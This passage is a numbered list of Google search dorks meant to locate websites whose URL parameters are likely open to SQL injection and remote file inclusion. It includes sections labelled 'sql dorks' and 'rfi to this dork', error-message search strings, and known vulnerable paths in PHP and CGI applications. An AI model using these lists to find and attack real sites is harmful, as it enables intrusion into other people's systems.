  3962. inurl:”folder.php?id=”
  3963. inurl:”index.php?canal=”
  3964. inurl:”index.php?Language=”
  3965. inurl:”view.php?page=”
  3966. dork: “Login to Calendar”
  3967. dork: “powered by EQdkp”
  3968. inurl:”video.php?content=”
  3969. inurl:”index1.php?menu=”
  3970. dork: inurl:surveys
  3971. inurl:”index.php?body=”
  3972. dork: allinurl:adobt sitel
  3973. rfi to this dork: /classes/adodbt/sql.php?classes_dir=
  3974. rfi to this dork: /sources/template.php?CONFIG[main_path]=
  3975. dork: allinurl:”mcf.php”
  3976. dork: inurl:”main.php?sayfa=”
  3977. dork: “MobilePublisherPHP”
  3978. rfi to this dork: /header.php?abspath=
  3979. allinurl:login.php?dir=
  3980. inurl:”lib/gore.php?libpath=”
  3981. –sql dorks–
  3982. inurl:trainers.php?id=
  3983. inurl:buy.php?category=
  3984. inurl:article.php?ID=
  3985. inurl:play_old.php?id=
  3986. inurl:declaration_more.php?decl_id=
  3987. inurl:games.php?id=
  3988. inurl:gallery.php?id=
  3989. inurl:show.php?id=
  3990. inurl:newsitem.php?num=
  3991. inurl:top10.php?cat=
  3992. inurl:reagir.php?num=
  3993. inurl:forum_bds.php?num=
  3994. inurl:view_product.php?id=
  3995. inurl:sw_comment.php?id=
  3996. inurl:avd_start.php?avd=
  3997. inurl:event.php?id=
  3998. inurl:news_view.php?id=
  3999. inurl:select_biblio.php?id=
  4000. inurl:humor.php?id=
  4001. inurl:aboutbook.php?id=
  4002. inurl:fiche_spectacle.php?id=
  4003. inurl:communique_detail.php?id=
  4004. inurl:sem.php3?id=
  4005. inurl:show_an.php?id=
  4006. inurl:preview.php?id=
  4007. inurl:spr.php?id=
  4008. inurl:participant.php?id=
  4009. inurl:main.php?id=
  4010. inurl:chappies.php?id=
  4011. inurl:viewphoto.php?id=
  4012. inurl:productinfo.php?id=
  4013. inurl:website.php?id=
  4014. inurl:hosting_info.php?id=
  4015. inurl:view_faq.php?id=
  4016. inurl:artikelinfo.php?id=
  4017. inurl:detail.php?ID=
  4018. inurl:category.php?id=
  4019. inurl:publications.php?id=
  4020. inurl:fellows.php?id=
  4021. inurl:prod_info.php?id=
  4022. inurl:collectionitem.php?id=
  4023. inurl:releases.php?id=
  4024. inurl:produit.php?id=
  4025. inurl:shopping.php?id=
  4026. inurl:productdetail.php?id=
  4027. inurl:post.php?id=
  4028. inurl:clubpage.php?id=
  4029. inurl:section.php?id=
  4030. inurl:theme.php?id=
  4031. inurl:page.php?id=
  4032. inurl:shredder-categories.php?id=
  4033. inurl:tradeCategory.php?id=
  4034. inurl:product_ranges_view.php?ID=
  4035. inurl:transcript.php?id=
  4036. inurl:channel_id=
  4037. inurl:item_id=
  4038. inurl:newsid=
  4039. inurl:news-full.php?id=
  4040. inurl:news_display.php?getid=
  4041. inurl:product-item.php?id=
  4042. inurl:loadpsb.php?id=
  4043. inurl:pages.php?id=
  4044. inurl:curriculum.php?id=
  4045. inurl:labels.php?id=
  4046. inurl:story.php?id=
  4047. inurl:look.php?ID=
  4048. inurl:material.php?id=
  4049. inurl:announce.php?id=
  4050. inurl:rub.php?idr=
  4051. inurl:galeri_info.php?l=
  4052. inurl:tekst.php?idt=
  4053. inurl:newsticker_info.php?idn=
  4054. inurl:rubp.php?idr=
  4055. inurl:offer.php?idf=
  4056. inurl:art.php?idm=
  4057. inurl:title.php?id=
  4058. inurl:buy.php?category=
  4059. inurl:declaration_more.php?decl_id=
  4060. inurl:Pageid=
  4061. inurl:games.php?id=
  4062. inurl:page.php?file=
  4063. inurl:article.php?id=
  4064. inurl:newsitem.php?num=
  4065. inurl:top10.php?cat=
  4066. inurl:avd_start.php?avd=
  4067. inurl:news_view.php?id=
  4068. inurl:faq2.php?id=
  4069. inurl:show_an.php?id=
  4070. inurl:main.php?id=
  4071. inurl:hosting_info.php?id=
  4072. inurl:detail.php?ID=
  4073. inurl:releases.php?id=
  4074. inurl:ray.php?id=
  4075. inurl:shopping.php?id=
  4076. inurl:theme.php?id=
  4077. inurl:shredder-categories.php?id=
  4078. inurl:product_ranges_view.php?ID=
  4079. inurl:shop_category.php?id=
  4080. inurl:announce.php?id=
  4081. inurl:viewapp.php?id=
  4082. inurl:galeri_info.php?l=
  4083. inurl:story.php?id=
  4084. inurl:newsticker_info.php?idn=
  4085. inurl:offer.php?idf=
  4086. inurl:”id=” & intext:”Warning: mysql_num_rows()
  4087. inurl:”id=” & intext:”Warning: session_start()
  4088. inurl:”id=” & intext:”Warning: getimagesize()
  4089. inurl:”id=” & intext:”Warning: is_writable()
  4090. inurl:”id=” & intext:”Warning: Unknown()
  4091. inurl:”id=” & intext:”Warning: pg_exec()
  4092. inurl:”id=” & intext:”Warning: filesize()
  4093. inurl:”id=” & intext:”Warning: require()
  4094. inurl:”id=” & intext:”Warning: mysql_fetch_array()
  4095. inurl:”id=” & intext:”Warning: mysql_result()
  4096. inurl:”id=” & intext:”Warning: array_merge()
  4097. inurl:”id=” & intext:”Warning: ilesize()
  4098. inurl:newsDetail.php?id=
  4099. inurl:staff_id=
  4100. inurl:historialeer.php?num=
  4101. inurl:event.php?id=
  4102. inurl:product-item.php?id=
  4103. inurl:sql.php?id=
  4104. inurl:aboutbook.php?id=
  4105. inurl:ogl_inet.php?ogl_id=
  4106. inurl:fiche_spectacle.php?id=
  4107. inurl:kategorie.php4?id=
  4108. inurl:preview.php?id=
  4109. inurl:participant.php?id=
  4110. inurl:chappies.php?id=
  4111. inurl:viewphoto.php?id=
  4112. inurl:website.php?id=
  4113. inurl:artikelinfo.php?id=
  4114. inurl:index.php?=
  4115. inurl:collectionitem.php?id=
  4116. inurl:band_info.php?id=
  4117. inurl:clubpage.php?id=
  4118. inurl:memberInfo.php?id=
  4119. inurl:transcript.php?id=
  4120. inurl:channel_id=
  4121. inurl:item_id=
  4122. inurl:newsid=
  4123. inurl:trainers.php?id=
  4124. inurl:news-full.php?id=
  4125. inurl:iniziativa.php?in=
  4126. inurl:curriculum.php?id=
  4127. inurl:look.php?ID=
  4128. inurl:opinions.php?id=
  4129. inurl:rubp.php?idr=
  4130. inurl:art.php?idm=
  4131. inurl:article.php?ID=
  4132. inurl:pageid=
  4133. inurl:readnews.php?id=
  4134. inurl:reagir.php?num=
  4135. inurl:Stray-Questions-View.php?num=
  4136. inurl:view_product.php?id=
  4137. inurl:newsone.php?id=
  4138. inurl:select_biblio.php?id=
  4139. inurl:sem.php3?id=
  4140. inurl:index.php?id=
  4141. inurl:pages.php?id=
  4142. inurl:download.php?id=
  4143. inurl:review.php?id=
  4144. inurl:view.php?id=
  4145. inurl:gallery.php?id=
  4146. inurl:view_faq.php?id=
  4147. inurl:category.php?id=
  4148. inurl:prod_info.php?id=
  4149. inurl:shop.php?do=part&id=
  4150. inurl:produit.php?id=
  4151. inurl:pop.php?id=
  4152. inurl:post.php?id=
  4153. inurl:section.php?id=
  4154. inurl:page.php?id=
  4155. inurl:tradeCategory.php?id=
  4156. inurl:loadpsb.php?id=
  4157. inurl:material.php?id=
  4158. inurl:clanek.php4?id=
  4159. inurl:read.php?id=
  4160. inurl:newscat.php?id=
  4161. inurl:play_old.php?id=
  4162. inurl:show.php?id=
  4163. inurl:forum_bds.php?num=
  4164. inurl:game.php?id=
  4165. inurl:sw_comment.php?id=
  4166. inurl:humor.php?id=
  4167. inurl:communique_detail.php?id=
  4168. inurl:news.php?id=
  4169. inurl:spr.php?id=
  4170. inurl:prod_detail.php?id=
  4171. inurl:person.php?id=
  4172. inurl:productinfo.php?id=
  4173. inurl:showimg.php?id=
  4174. inurl:rub.php?idr=
  4175. inurl:profile_view.php?id=
  4176. inurl:publications.php?id=
  4177. inurl:fellows.php?id=
  4178. inurl:downloads_info.php?id=
  4179. inurl:Productinfo.php?id=
  4180. inurl:product.php?id=
  4181. inurl:productdetail.php?id=
  4182. inurl:viewshowdetail.php?id=
  4183. inurl:news_display.php?getid=
  4184. inurl:index2.php?option=
  4185. inurl:ages.php?id=
  4186. inurl:labels.php?id=
  4187. inurl:tekst.php?idt=
  4188. inurl:rubrika.php?idr=
  4189. inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
  4190. inurl:”id=” & intext:”Warning: mysql_query()
  4191. inurl:”id=” & intext:”Warning: preg_match()
  4192. trainers.php?id=
  4193. declaration_more.php?decl_id=
  4194. Pageid=
  4195. games.php?id=
  4196. newsDetail.php?id=
  4197. staff_id=
  4198. communique_detail.php?id=
  4199. opinions.php?id=
  4200. spr.php?id=
  4201. website.php?id=
  4202. hosting_info.php?id=
  4203. detail.php?ID=
  4204. publications.php?id=
  4205. Productinfo.php?id=
  4206. releases.php?id=
  4207. produit.php?id=
  4208. pop.php?id=
  4209. shopping.php?id=
  4210. productdetail.php?id=
  4211. section.php?id=
  4212. page.php?id=
  4213. shredder-categories.php?id=
  4214. newsid=
  4215. news_display.php?getid=
  4216. ages.php?id=
  4217. review.php?id=
  4218. iniziativa.php?in=
  4219. curriculum.php?id=
  4220. tekst.php?idt=
  4221. newscat.php?id=
  4222. newsticker_info.php?idn=
  4223. rubrika.php?idr=
  4224. offer.php?idf=
  4225. “id=” & intext:”Warning: mysql_fetch_array()
  4226. “id=” & intext:”Warning: getimagesize()
  4227. “id=” & intext:”Warning: session_start()
  4228. “id=” & intext:”Warning: mysql_num_rows()
  4229. “id=” & intext:”Warning: mysql_query()
  4230. “id=” & intext:”Warning: array_merge()
  4231. “id=” & intext:”Warning: preg_match()
  4232. “id=” & intext:”Warning: ilesize()
  4233. “id=” & intext:”Warning: filesize()
  4234. index.php?id=
  4235. buy.php?category=
  4236. article.php?ID=
  4237. play_old.php?id=
  4238. top10.php?cat=
  4239. historialeer.php?num=
  4240. reagir.php?num=
  4241. sw_comment.php?id=
  4242. avd_start.php?avd=
  4243. event.php?id=
  4244. news_view.php?id=
  4245. humor.php?id=
  4246. ogl_inet.php?ogl_id=
  4247. sem.php3?id=
  4248. kategorie.php4?id=
  4249. preview.php?id=
  4250. participant.php?id=
  4251. chappies.php?id=
  4252. read.php?id=
  4253. prod_detail.php?id=
  4254. article.php?id=
  4255. view.php?id=
  4256. gery.php?id=
  4257. rub.php?idr=
  4258. artikelinfo.php?id=
  4259. index.php?=
  4260. profile_view.php?id=
  4261. category.php?id=
  4262. fellows.php?id=
  4263. downloads_info.php?id=
  4264. product.php?id=
  4265. ray.php?id=
  4266. post.php?id=
  4267. memberInfo.php?id=
  4268. theme.php?id=
  4269. tradeCategory.php?id=
  4270. product_ranges_view.php?ID=
  4271. shop_category.php?id=
  4272. channel_id=
  4273. item_id=
  4274. readnews.php?id=
  4275. product-item.php?id=
  4276. pages.php?id=
  4277. clanek.php4?id=
  4278. viewphoto.php?id=
  4279. galeri_info.php?l=
  4280. labels.php?id=
  4281. look.php?ID=
  4282. aboutbook.php?id=
  4283. “id=” & intext:”Warning: mysql_fetch_assoc()
  4284. “id=” & intext:”Warning: is_writable()
  4285. “id=” & intext:”Warning: Unknown()
  4286. “id=” & intext:”Warning: mysql_result()
  4287. “id=” & intext:”Warning: pg_exec()
  4288. “id=” & intext:”Warning: require()
  4289. pageid=
  4290. page.php?file=
  4291. show.php?id=
  4292. newsitem.php?num=
  4293. Stray-Questions-View.php?num=
  4294. forum_bds.php?num=
  4295. game.php?id=
  4296. view_product.php?id=
  4297. news.php?id=
  4298. sql.php?id=
  4299. select_biblio.php?id=
  4300. fiche_spectacle.php?id=
  4301. faq2.php?id=
  4302. show_an.php?id=
  4303. loadpsb.php?id=
  4304. announce.php?id=
  4305. download.php?id=
  4306. person.php?id=
  4307. productinfo.php?id=
  4308. showimg.php?id=
  4309. view_faq.php?id=
  4310. prod_info.php?id=
  4311. shop.php?do=part&id=
  4312. collectionitem.php?id=
  4313. band_info.php?id=
  4314. viewshowdetail.php?id=
  4315. clubpage.php?id=
  4316. transcript.php?id=
  4317. news-full.php?id=
  4318. material.php?id=
  4319. viewapp.php?id=
  4320. story.php?id=
  4321. newsone.php?id=
  4322. rubp.php?idr=
  4323. art.php?idm=
  4324. title.php?id=
  4325. index1.php?modo=
  4326. include.php?*[*]*=
  4327. padrao.php?pre=
  4328. home.php?pa=
  4329. general.php?xlink=
  4330. show.php?corpo=
  4331. info.php?strona=
  4332. show.php?x=
  4333. file.php?inc=
  4334. principal.php?param=
  4335. info.php?chapter=
  4336. general.php?include=
  4337. index1.php?qry=
  4338. press.php?seite=
  4339. gery.php?seccion=
  4340. page.php?chapter=
  4341. mod*.php?channel=
  4342. down*.php?phpbb_root_path=
  4343. gery.php?phpbb_root_path=
  4344. sub*.php?destino=
  4345. info.php?read=
  4346. sitio.php?get=
  4347. enter.php?a=
  4348. main.php?second=
  4349. home.php?loader=
  4350. index.php?disp=
  4351. sitio.php?section=
  4352. nota.php?doshow=
  4353. home.php?a=
  4354. principal.php?goto=
  4355. sub*.php?str=
  4356. start.php?index=
  4357. index1.php?*[*]*=
  4358. pagina.php?oldal=
  4359. gery.php?disp=
  4360. head.php?filepath=
  4361. sub*.php?action=
  4362. padrao.php?h=
  4363. gery.php?viewpage=
  4364. nota.php?pr=
  4365. padrao.php?destino=
  4366. index.php?ev=
  4367. pagina.php?pre=
  4368. nota.php?content=
  4369. index.php?sivu=
  4370. info.php?t=
  4371. principal.php?s=
  4372. standard.php?pagina=
  4373. pagina.php?basepath=
  4374. include.php?goto=
  4375. file.php?pg=
  4376. index3.php?open=
  4377. pagina.php?my=
  4378. gery.php?pre=
  4379. enter.php?open=
  4380. gery.php?*[*]*=
  4381. include.php?numero=
  4382. gery.php?ki=
  4383. down*.php?second=
  4384. layout.php?goto=
  4385. include.php?oldal=
  4386. home.php?str=
  4387. mod*.php?dir=
  4388. layout.php?xlink=
  4389. default.php?oldal=
  4390. template.php?k=
  4391. include.php?url=
  4392. base.php?sivu=
  4393. default.php?str=
  4394. view.php?page=
  4395. gery.php?qry=
  4396. index1.php?pre=
  4397. start.php?in=
  4398. show.php?abre=
  4399. home.php?ev=
  4400. blank.php?loader=
  4401. template.php?s=
  4402. *inc*.php?ev=
  4403. index3.php?cmd=
  4404. index3.php?xlink=
  4405. index3.php?disp=
  4406. head.php?left=
  4407. blank.php?strona=
  4408. principal.php?middlePart=
  4409. mod*.php?m=
  4410. index.php?recipe=
  4411. template.php?path=
  4412. blank.php?page=
  4413. sub*.php?category=
  4414. *inc*.php?body=
  4415. gery.php?pollname=
  4416. down*.php?open=
  4417. down*.php?pageweb=
  4418. sitio.php?tipo=
  4419. default.php?destino=
  4420. down*.php?r=
  4421. standard.php?e=
  4422. default.php?id=
  4423. standard.php?panel=
  4424. gery.php?where=
  4425. gery.php?sp=
  4426. show.php?chapter=
  4427. template.php?doshow=
  4428. start.php?op=
  4429. view.php?header=
  4430. sub*.php?content=
  4431. base.php?id=
  4432. gery.php?index=
  4433. nota.php?h=
  4434. sub*.php?play=
  4435. index2.php?chapter=
  4436. gery.php?to=
  4437. info.php?base_dir=
  4438. gery.php?abre=
  4439. gery.php?pag=
  4440. index.php?pre=
  4441. base.php?seite=
  4442. *inc*.php?j=
  4443. file.php?type=
  4444. index2.php?OpenPage=
  4445. gery.php?secao=
  4446. head.php?where=
  4447. gery.php?showpage=
  4448. gery.php?go=
  4449. enter.php?start=
  4450. general.php?p=
  4451. index2.php?get=
  4452. sub*.php?oldal=
  4453. print.php?sivu=
  4454. default.php?cont=
  4455. file.php?middle=
  4456. gery.php?get=
  4457. index2.php?f=
  4458. gery.php?cont=
  4459. principal.php?type=
  4460. default.php?secao=
  4461. view.php?pg=
  4462. pagina.php?choix=
  4463. index1.php?get=
  4464. sub*.php?left=
  4465. view.php?type=
  4466. principal.php?strona=
  4467. info.php?l=
  4468. pagina.php?category=
  4469. index2.php?pref=
  4470. show.php?ki=
  4471. page.php?strona=
  4472. gery.php?itemnav=
  4473. info.php?go=
  4474. page.php?secao=
  4475. nota.php?pag=
  4476. info.php?z=
  4477. general.php?strona=
  4478. show.php?my=
  4479. padrao.php?index=
  4480. gery.php?thispage=
  4481. gery.php?panel=
  4482. standard.php?ev=
  4483. main.php?basepath=
  4484. index1.php?tipo=
  4485. mod*.php?choix=
  4486. template.php?secao=
  4487. principal.php?ir=
  4488. default.php?pageweb=
  4489. index.php?oldal=
  4490. gery.php?mid=
  4491. index.php?type=
  4492. info.php?incl=
  4493. blank.php?goto=
  4494. principal.php?subject=
  4495. show.php?r=
  4496. pagina.php?thispage=
  4497. page.php?*[*]*=
  4498. main.php?h=
  4499. file.php?seccion=
  4500. home.php?z=
  4501. mod*.php?b=
  4502. default.php?showpage=
  4503. principal.php?home=
  4504. standard.php?sivu=
  4505. nota.php?lang=
  4506. path.php?sivu=
  4507. default.php?ref=
  4508. default.php?inc=
  4509. print.php?disp=
  4510. gery.php?var=
  4511. base.php?v=
  4512. sitio.php?sivu=
  4513. main.php?r=
  4514. start.php?sivu=
  4515. template.php?c=
  4516. home.php?loc=
  4517. page.php?eval=
  4518. pagina.php?pr=
  4519. home.php?e=
  4520. gery.php?name=
  4521. index2.php?load=
  4522. principal.php?in=
  4523. template.php?viewpage=
  4524. view.php?go=
  4525. layout.php?play=
  4526. info.php?middlePart=
  4527. sub*.php?body=
  4528. show.php?index=
  4529. padrao.php?link=
  4530. standard.php?viewpage=
  4531. *inc*.php?showpage=
  4532. head.php?abre=
  4533. home.php?body=
  4534. gery.php?module=
  4535. sitio.php?mid=
  4536. main.php?goto=
  4537. index1.php?body=
  4538. down*.php?pag=
  4539. standard.php?w=
  4540. blank.php?menu=
  4541. general.php?nivel=
  4542. *inc*.php?addr=
  4543. *inc*.php?link=
  4544. *inc*.php?incl=
  4545. down*.php?url=
  4546. head.php?loader=
  4547. blank.php?in=
  4548. nota.php?goFile=
  4549. head.php?base_dir=
  4550. mod*.php?recipe=
  4551. padrao.php?*[*]*=
  4552. general.php?seite=
  4553. pagina.php?numero=
  4554. view.php?seite=
  4555. show.php?ir=
  4556. mod*.php?pname=
  4557. template.php?header=
  4558. main.php?name=
  4559. head.php?dir=
  4560. *inc*.php?k=
  4561. sub*.php?*[*]*=
  4562. page.php?q=
  4563. index1.php?type=
  4564. gery.php?y=
  4565. gery.php?page=
  4566. show.php?recipe=
  4567. file.php?numero=
  4568. standard.php?link=
  4569. view.php?pollname=
  4570. gery.php?pg=
  4571. gery.php?param=
  4572. principal.php?addr=
  4573. path.php?opcion=
  4574. print.php?category=
  4575. layout.php?secao=
  4576. standard.php?ref=
  4577. base.php?include=
  4578. template.php?seite=
  4579. index2.php?param=
  4580. enter.php?ev=
  4581. standard.php?middle=
  4582. blank.php?dir=
  4583. home.php?pageweb=
  4584. show.php?pagina=
  4585. blank.php?abre=
  4586. page.php?loader=
  4587. enter.php?id=
  4588. file.php?channel=
  4589. sub*.php?include=
  4590. enter.php?s=
  4591. gery.php?pageweb=
  4592. general.php?modo=
  4593. default.php?play=
  4594. blank.php?destino=
  4595. module_db.php?pivot_path= module_db.php?pivot_path=”
  4596. /classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
  4597. com_extended_registration
  4598. smarty_config.php?root_dir= “smarty”
  4599. include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
  4600. send_reminders.php?includedir= “send_reminders.php?includedir=”
  4601. components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
  4602. inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
  4603. /components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
  4604. [Script Path]/admin/index.php?o= admin/index.php”;
  4605. /admin/index.php?o= admin/index.php”;
  4606. admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
  4607. /components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
  4608. components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
  4609. /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
  4610. inst/index.php?lng=../../include/main.inc&G_PATH=
  4611. becommunity/community/index.php?pageurl=
  4612. agendax/addevent.inc.php?agendax_path=
  4613. yabbse/Sources/Packages.php?sourcedir=
  4614. path_of_cpcommerce/_functions.php?prefix
  4615. dotproject/modules/projects/vw_files.php?root_dir=
  4616. dotproject/modules/tasks/viewgantt.php?root_dir=
  4617. modules/coppermine/themes/default/theme.php?THEME_DIR=
  4618. modules/agendax/addevent.inc.php?agendax_path=
  4619. shoutbox/expanded.php?conf=
  4620. *default.php?page=
  4621. *default.php?body=
  4622. *index.php?url=
  4623. *index.php?arquivo=
  4624. index.php?page=
  4625. Index.php?id=
  4626. mainfile.php?MAIN_PATH=
  4627. cgi-bin/awstats.pl?update=1&logfile=
  4628. cgi-bin/awstats/awstats.pl?configdir
  4629. cgi-bin/quikstore.cgi?category=
  4630. cgi-bin/telnet.cgi
  4631. calendar.pl?command=login&fromTemplate=
  4632. encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=
  4633. events.cgi?t=
  4634. powerup.cgi?a=latest&t=
  4635. lc.cgi?a=
  4636. news.cgi?a=114&t=
  4637. biznews.cgi?a=33&t=
  4638. jobs.cgi?a=9&t=
  4639. articles.cgi?a=34&t=
  4640. events.cgi?a=155&t=
  4641. latinbitz.cgi?t=
  4642. newsdesk.cgi?t=
  4643. media.cgi?a=11&t=
  4644. reporter.cgi?t=
  4645. news.cgi?t=
  4646. newsupdate.cgi?a=latest&t=
  4647. deportes.cgi?a=latest&t=
  4648. news.cgi?a=latest&t=
  4649. whereami.cgi?g=id
  4650. auktion.pl?menue=
  4651. i-m/i-m.cgi?p=
  4652. vote.pl?action=show&id=
  4653. shop.pl/page=
  4654. newsdesk.cgi?a=latest&t=
  4655. fileseek.cgi?head=&foot=
  4656. cgi-bin/probe.cgi?olddat=
  4657. emsgb/easymsgb.pl?print=
  4658. app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=
  4659. csv_db/csv_db.cgi?fil e=file.extention
  4660. cgi-bin/jammail.pl?job=showoldmail&mail=
  4661. cgi-bin/bbs/read.cgi?file=
  4662. support_page.cgi?file_name=
  4663. index.php?include=
  4664. index5.php?configFile=
  4665. index5.php?page=
  4666. index5.php?content=
  4667. index5.php?x=
  4668. index5.php?open=
  4669. index5.php?m=
  4670. index5.php?site=
  4671. index5.php?cat=
  4672. index.php?d=
  4673. index.php?e=
  4674. index.php?f=
  4675. index.php?g=
  4676. index.php?h=
  4677. index.php?i=
  4678. index.php?j=
  4679. index.php?k=
  4680. index.php?n=
  4681. index.php?o=
  4682. index.php?q=
  4683. index.php?s=
  4684. index.php?u=
  4685. index.php?v=
  4686. index.php?z=
  4687. index.php?loc=
  4688. index.php?seite=
  4689. index2.php?d=
  4690. index2.php?a=
  4691. index.php?ir=
  4692. index2.php?b=
  4693. index2.php?c=
  4694. index2.php?e=
  4695. index2.php?g=
  4696. index2.php?h=
  4697. index2.php?i=
  4698. index2.php?j=
  4699. index2.php?k=
  4700. index2.php?l=
  4701. index2.php?m=
  4702. index2.php?n=
  4703. index2.php?o=
  4704. index2.php?q=
  4705. index2.php?r=
  4706. index2.php?s=
  4707. index2.php?t=
  4708. index2.php?v=
  4709. index2.php?y=
  4710. index2.php?z=
  4711. index5.php?inc=
  4712. index5.php?pg=
  4713. index5.php?lv1=
  4714. index.php?sub2=
  4715. index.php?lv1=
  4716. index.php?directfile=
  4717. index.php?funcion=
  4718. index.php?ll=
  4719. index.php?lnk=
  4720. index5.php?main=
  4721. index5.php?include=
  4722. index5.php?root=
  4723. index5.php?pagina=
  4724. index.php?theme=
  4725. index.php?acao=
  4726. index5.php?cont=
  4727. index5.php?pag=
  4728. index5.php?p=
  4729. index5.php?lang=
  4730. index5.php?language=
  4731. llindex.php?sub=
  4732. index2.php?lv1=
  4733. index2.php?sub=
  4734. index2.php?directfile=
  4735. index2.php?funcion=
  4736. index2.php?sub2=
  4737. index2.php?ll=
  4738. index2.php?lnk=
  4739. index5.php?body=
  4740. index5.php?visualizar=
  4741. index5.php?do=
  4742. index2.php?theme=
  4743. index2.php?acao=
  4744. index2:php?aa=
  4745. index3:php?aa=
  4746. index.php?server=
  4747. index.php?cal=
  4748. index.php?prefix=
  4749. index.php?root_PATH=
  4750. index.php?gorumdir=
  4751. index2.php?cont=
  4752. index2.php?server=
  4753. index2.php?cal=
  4754. index2.php?prefix=
  4755. index2.php?root_PATH=
  4756. index2.php?path= AKI
  4757. exibir.php?abre=
  4758. exibir.php?page=
  4759. exibir.php?get=
  4760. exibir.php?p=
  4761. exibir.php?lang=
  4762. index2.php?gorumdir=
  4763. index2.php?pag=
  4764. index2.php?lang=
  4765. index2.php?language=
  4766. index.php?middle=
  4767. step_one_tables.php?server_inc=
  4768. grademade/index.php?page=
  4769. phpshop/index.php?base_dir=
  4770. admin.php?cal_dir=
  4771. convert-date.php?cal_dir=
  4772. album_portal.php?phpbb_root_path=
  4773. index_table.php?root_dir=
  4774. affich.php?base=
  4775. init.php?HTTP_POST_VARS=
  4776. lib.inc.php?pm_path=
  4777. include.php?gorumDir=
  4778. start_lobby.php?CONFIG[MWCHAT_Libs]=
  4779. index.php?lng=../../include/main.inc&G_PATH=
  4780. initdb.php?absolute_path=
  4781. pipe.php?HCL_path=
  4782. write.php?dir=
  4783. new-visitor.inc.php?lvc_include_dir=
  4784. header.php?systempath=
  4785. theme.php?THEME_DIR=
  4786. Packages.php?sourcedir=
  4787. _functions.php?prefix
  4788. addedit.php?root_dir=
  4789. view.php?root_dir=
  4790. vw_files.php?root_dir=
  4791. viewgantt.php?root_dir=
  4792. displayCategory.php?basepath=
  4793. default/theme.php?THEME_DIR=
  4794. upgrade_album.php?GERY_BASEDIR=
  4795. init.inc.php?CPG_M_DIR=
  4796. mod_mainmenu.php?mosConfig_absolute_path=
  4797. editor.php?root=
  4798. lib.php?root=
  4799. secure_img_render.php?p=
  4800. arquivo.php?data=
  4801. word.php?id=
  4802. mod.php?mod=
  4803. index.php?plugin=
  4804. sendpage.php?page=
  4805. index.php?hl=
  4806. modules.php?op=
  4807. index.php?templateid=
  4808. article.php?sid=
  4809. .php?my=”
  4810. .php?a=”
  4811. .php?f=”
  4812. .php?z=”
  4813. .php?zo=”
  4814. .php?la=”
  4815. .php?perm=”
  4816. .php?item_id=”
  4817. .php?f_content=”
  4818. .php?from=”
  4819. .php?mid=”
  4820. .php?lest=”
  4821. .php?east=”
  4822. .gov.br/index.php?arquivo=
  4823. index.php?ver=
  4824. /contenido/classes/class.inuse.php
  4825. news.php?CONFIG[script_path]=
  4826. index.php?vpagina=
  4827. index.php?arq=
  4828. index.php?pg_ID=
  4829. */newbb/print.php?forum=*topic_id=*”
  4830. */newbb_plus/*=”
  4831. */news/archive.php?op=*year=*month=*”
  4832. .php?abrir=”
  4833. .php?act=”
  4834. .php?action=”
  4835. .php?ad=”
  4836. .php?archive=”
  4837. .php?area=”
  4838. .php?article=”
  4839. .php?b=”
  4840. */tsep/include/colorswitch.php?tsep_config[absPath]=*”
  4841. .php?back=”
  4842. .php?base=”
  4843. .php?basedir=”
  4844. .php?bbs=”
  4845. .php?board_no=”
  4846. .php?body=”
  4847. .php?c=”
  4848. .php?cal_dir=”
  4849. .php?cat=”
  4850. /include/init.inc.php?CPG_M_DIR=”
  4851. /includes/mx_functions_ch.php?phpbb_root_path=”
  4852. /modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=”
  4853. .php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=”
  4854. .php?subd=”
  4855. .php?subdir=”
  4856. .php?category=”
  4857. .php?choice=”
  4858. .php?class=”
  4859. .php?club_id=”
  4860. .php?cod.tipo=”
  4861. .php?cod=”
  4862. .php?conf=”
  4863. .php?configFile=”
  4864. .php?cont=”
  4865. .php?corpo=”
  4866. .php?cvsroot=”
  4867. .php?d=”
  4868. .php?da=”
  4869. .php?date=”
  4870. .php?debug=”
  4871. .php?debut=”
  4872. .php?default=”
  4873. .php?destino=”
  4874. .php?dir=”
  4875. .php?display=”
  4876. .php?file_id=”
  4877. .php?file=”
  4878. .php?filepath=”
  4879. .php?flash=”
  4880. .php?folder=”
  4881. .php?for=”
  4882. .php?form=”
  4883. .php?formatword=”
  4884. .php?funcao=”
  4885. .php?function=”
  4886. .php?g=”
  4887. .php?get=”
  4888. .php?go=”
  4889. .php?gorumDir=”
  4890. .php?goto=”
  4891. .php?h=”
  4892. .php?headline=”
  4893. .php?i=”
  4894. .php?inc=”
  4895. .php?include=”
  4896. .php?includedir=”
  4897. .php?inter=”
  4898. .php?itemid=”
  4899. .php?j=”
  4900. .php?join=”
  4901. .php?jojo=”
  4902. .php?l=”
  4903. .php?lan=”
  4904. .php?lang=”
  4905. .php?link=”
  4906. .php?load=”
  4907. .php?loc=”
  4908. .php?m=”
  4909. .php?main=”
  4910. .php?meio.php=”
  4911. .php?meio=”
  4912. .php?menu=”
  4913. .php?menuID=”
  4914. .php?mep=”
  4915. .php?month=”
  4916. .php?mostra=”
  4917. .php?n=”
  4918. .php?name=”
  4919. .php?nav=”
  4920. .php?new=”
  4921. .php?news=”
  4922. .php?next=”
  4923. .php?nextpage=”
  4924. .php?o=”
  4925. .php?op=”
  4926. .php?open=”
  4927. .php?option=”
  4928. .php?origem=”
  4929. .php?Page_ID=”
  4930. .php?pageurl=”
  4931. .php?para=”
  4932. .php?part=”
  4933. .php?pg=”
  4934. .php?pid=”
  4935. .php?place=”
  4936. .php?play=”
  4937. .php?plugin=”
  4938. .php?pm_path=”
  4939. .php?pollname=”
  4940. .php?post=”
  4941. .php?pr=”
  4942. .php?prefix=”
  4943. .php?prefixo=”
  4944. .php?q=”
  4945. .php?redirect=”
  4946. .php?ref=”
  4947. .php?refid=”
  4948. .php?regionId=”
  4949. .php?release_id=”
  4950. .php?release=”
  4951. .php?return=”
